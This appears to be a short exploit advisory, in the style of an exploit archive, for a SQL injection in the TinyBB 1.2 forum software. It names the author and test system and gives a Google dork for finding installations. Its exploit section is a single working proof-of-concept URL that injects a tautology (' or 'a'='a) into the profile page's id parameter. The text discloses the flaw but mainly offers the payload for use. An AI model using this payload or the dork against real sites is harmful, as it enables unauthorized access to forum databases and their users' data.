31 lines
No EOL
682 B
Text
31 lines
No EOL
682 B
Text
+-------------------------------+
|
|
| TinyBB 1.2 SQLi Vulnerability |
|
|
+-------------------------------+
|
|
|
|
|
|
|
|
Vulnerable Web-App : TinyBB 1.2
|
|
Vulnerability : SQL Injection.
|
|
Author : Aodrulez.
|
|
Email : f3arm3d3ar@gmail.com
|
|
Google-Dork : "TinyBB 2011 all rights reserved"
|
|
Tested on : Ubuntu 10.04
|
|
|
|
+---------+
|
|
| Exploit |
|
|
+---------+
|
|
|
|
TinyBB Version 1.2 is vulnerable to SQLi.
|
|
|
|
http://127.0.0.1/index.php?page=profile&id=' or 'a'='a
|
|
|
|
|
|
+-------------------+
|
|
| Greetz Fly Out To |
|
|
+-------------------+
|
|
|
|
|
|
1] Amforked() : My Mentor.
|
|
2] The Blue Genius : My Boss.
|
|
3] www.orchidseven.com
|
|
4] www.malcon.org |